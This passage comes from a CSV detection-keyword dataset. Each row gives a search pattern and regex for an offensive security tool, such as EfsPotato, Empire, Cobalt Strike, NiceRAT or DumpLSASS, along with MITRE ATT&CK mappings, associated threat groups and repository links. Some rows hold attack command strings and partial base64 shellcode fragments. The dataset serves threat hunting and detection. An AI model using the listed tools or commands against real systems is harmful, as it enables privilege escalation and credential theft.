EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation 
vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43005" "*EfsPotato*lsarpc*",".{0,1000}EfsPotato.{0,1000}lsarpc.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43006" "*EfsPotato*lsass*",".{0,1000}EfsPotato.{0,1000}lsass.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43007" "*EfsPotato*netlogon*",".{0,1000}EfsPotato.{0,1000}netlogon.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43008" "*EfsPotato*samr*",".{0,1000}EfsPotato.{0,1000}samr.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege 
Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43009" "*EfsPotato.exe*",".{0,1000}EfsPotato\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","43010" "*EfsPotato-main*",".{0,1000}EfsPotato\-main.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43011" "*eg0he2d9cr3hpvt3z76trvkl7n2bivgscpwd5xfgn0oqgqlq00*",".{0,1000}eg0he2d9cr3hpvt3z76trvkl7n2bivgscpwd5xfgn0oqgqlq00.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#certificate","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","43012" "*EgeBalci/amber@latest*",".{0,1000}EgeBalci\/amber\@latest.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43014" "*EgeBalci/sgn*",".{0,1000}EgeBalci\/sgn.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate 
payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","1","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","43015" "*EgeBalci/WSAAcceptBackdoor*",".{0,1000}EgeBalci\/WSAAcceptBackdoor.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","1","N/A","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","43016" "*EggShell.py*",".{0,1000}EggShell\.py.{0,1000}","offensive_tool_keyword","Eggshell","EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files. tab completion. taking pictures. location tracking. shell command execution. persistence. escalating privileges. password retrieval. and much more. This is project is a proof of concept. 
intended for use on machines you own","T1027 - T1553 - T1003 - T1059 - T1558.001","TA0002 - TA0006 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/neoneggplant/EggShell","1","1","N/A","N/A","N/A","10","1693","384","2021-03-25T22:04:52Z","2015-07-02T16:58:30Z","43017" "*egjidjbpglichdcondbcbdnbeeppgdph*",".{0,1000}egjidjbpglichdcondbcbdnbeeppgdph.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","43018" "*Egress-Assess Exfil Data*",".{0,1000}Egress\-Assess\sExfil\sData.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#email","email subject","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43019" "*Egress-Assess Report*",".{0,1000}Egress\-Assess\sReport.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43020" "*Egress-Assess transfer share*",".{0,1000}Egress\-Assess\stransfer\sshare.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - 
TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43021" "*EgressAssess With Attachment*",".{0,1000}EgressAssess\sWith\sAttachment.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#email","email body","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43022" "*Egress-Assess.*",".{0,1000}Egress\-Assess\..{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43023" "*EgressAssess.ps1*",".{0,1000}EgressAssess\.ps1.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43024" "*Egress-Assess-master*",".{0,1000}Egress\-Assess\-master.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - 
DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43025" "*egressbuster*",".{0,1000}egressbuster.{0,1000}","offensive_tool_keyword","egressbuster","EgressBuster is a way to test the effectiveness of egress filtering for an individual area. When performing a penetration test. often times companies leverage egress filtering in order to prevent access to the outside Internet. Most companies have special exceptions and allow ports but they may be difficult to find.","T1046 - T1570 - T1590","TA0001 - TA0007","N/A","N/A","Exploitation tool","https://github.com/trustedsec/egressbuster","1","1","N/A","N/A","N/A","4","365","108","2024-07-30T16:17:48Z","2015-05-14T02:19:26Z","43026" "*egresscheck-framework*",".{0,1000}egresscheck\-framework.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-EgressCheck.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43027" "*ehang-io/nps*",".{0,1000}ehang\-io\/nps.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","1","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43028" 
"*EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQj*",".{0,1000}EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQj.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","calc base64 shellcode","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","43031" "*EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI*",".{0,1000}EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#content","N/A","9","","N/A","","","","43032" "*eigblbgjknlfbajkfhopmcojidlgcehm*",".{0,1000}eigblbgjknlfbajkfhopmcojidlgcehm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","43034" "*ejabberd2john.py*",".{0,1000}ejabberd2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43035" "*ejbalbakoplchlghecdalmeeeajnimhm*",".{0,1000}ejbalbakoplchlghecdalmeeeajnimhm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","43036" "*ejjladinnckdgjemekebdpeokbikhfci*",".{0,1000}ejjladinnckdgjemekebdpeokbikhfci.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","43037" "*eKeys\*-eKeys.txt*",".{0,1000}eKeys\\.{0,1000}\-eKeys\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","43039" "*eladshamir/BadWindowsService*",".{0,1000}eladshamir\/BadWindowsService.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","1","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","43042" "*eladshamir/RPC-Backdoor*",".{0,1000}eladshamir\/RPC\-Backdoor.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","1","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","43043" "*eladshamir/SharpElevator*",".{0,1000}eladshamir\/SharpElevator.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","1","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","43044" "*eldraco/domain_analyzer*",".{0,1000}eldraco\/domain_analyzer.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","1","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","43047" "*electrum2john.py*",".{0,1000}electrum2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43048" "*elementalsouls/DumpLSASS*",".{0,1000}elementalsouls\/DumpLSASS.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","1","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","43049" "*elevate juicypotato *",".{0,1000}elevate\sjuicypotato\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - 
BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43050" "*elevate Printspoofer*",".{0,1000}elevate\sPrintspoofer.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - 
PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crisprss/PrintSpoofer","1","0","N/A","N/A","10","10","88","12","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z","43051" "*elevate svc-exe *",".{0,1000}elevate\ssvc\-exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 
29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43052" "*ElevatePrivs*",".{0,1000}ElevatePrivs.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43054" "*Elevating to SYSTEM via 
token duplication for LSA secret retrieval*",".{0,1000}Elevating\sto\sSYSTEM\svia\stoken\sduplication\sfor\sLSA\ssecret\sretrieval.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","43055" "*elevationstation.cpp*",".{0,1000}elevationstation\.cpp.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","43056" "*elevationstation.exe*",".{0,1000}elevationstation\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","43057" "*elevationstation.git*",".{0,1000}elevationstation\.git.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","43058" "*elevationstation.sln*",".{0,1000}elevationstation\.sln.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","43059" "*elevationstation-main*",".{0,1000}elevationstation\-main.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","43060" "*elevator.exe *cmd.exe*",".{0,1000}elevator\.exe\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","43061" 